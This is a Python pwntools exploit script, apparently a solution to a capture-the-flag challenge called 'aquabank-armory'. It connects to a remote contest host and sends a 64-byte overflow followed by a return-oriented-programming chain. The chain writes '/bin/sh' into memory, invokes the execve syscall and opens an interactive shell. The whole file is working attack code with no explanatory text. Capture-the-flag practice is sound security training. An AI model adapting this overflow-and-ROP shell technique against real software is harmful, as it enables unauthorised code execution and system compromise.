from pwn import *

OFF = 64
context.binary = elf = ELF("./aquabank-armory", checksec=False)
# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13540)
print(p.recvline(b"[armory] Storeroom open -- pick your weapons:\n"))
ret = 0x000000000040101A
syscall = 0x0000000000401324
pop_rdi = 0x000000000040196E
pop_rsi = 0x0000000000401977
pop_rdx = 0x0000000000401980
pop_rax = 0x00000000004214EB
writable = 0x4AC000
mov_qword_ptr_rdx_rax = 0x000000000040AB08
shellstr = b"/bin/sh\x00"
payload = flat(
    b"A" * OFF,
    p64(ret),
    p64(pop_rdx),
    p64(writable),
    p64(pop_rax),
    shellstr,
    p64(mov_qword_ptr_rdx_rax),
    p64(pop_rax),
    p64(59),
    p64(pop_rdi),
    p64(writable),
    p64(pop_rsi),
    p64(0),
    p64(pop_rdx),
    p64(0),
    p64(syscall),
)
p.sendline(payload)
p.interactive()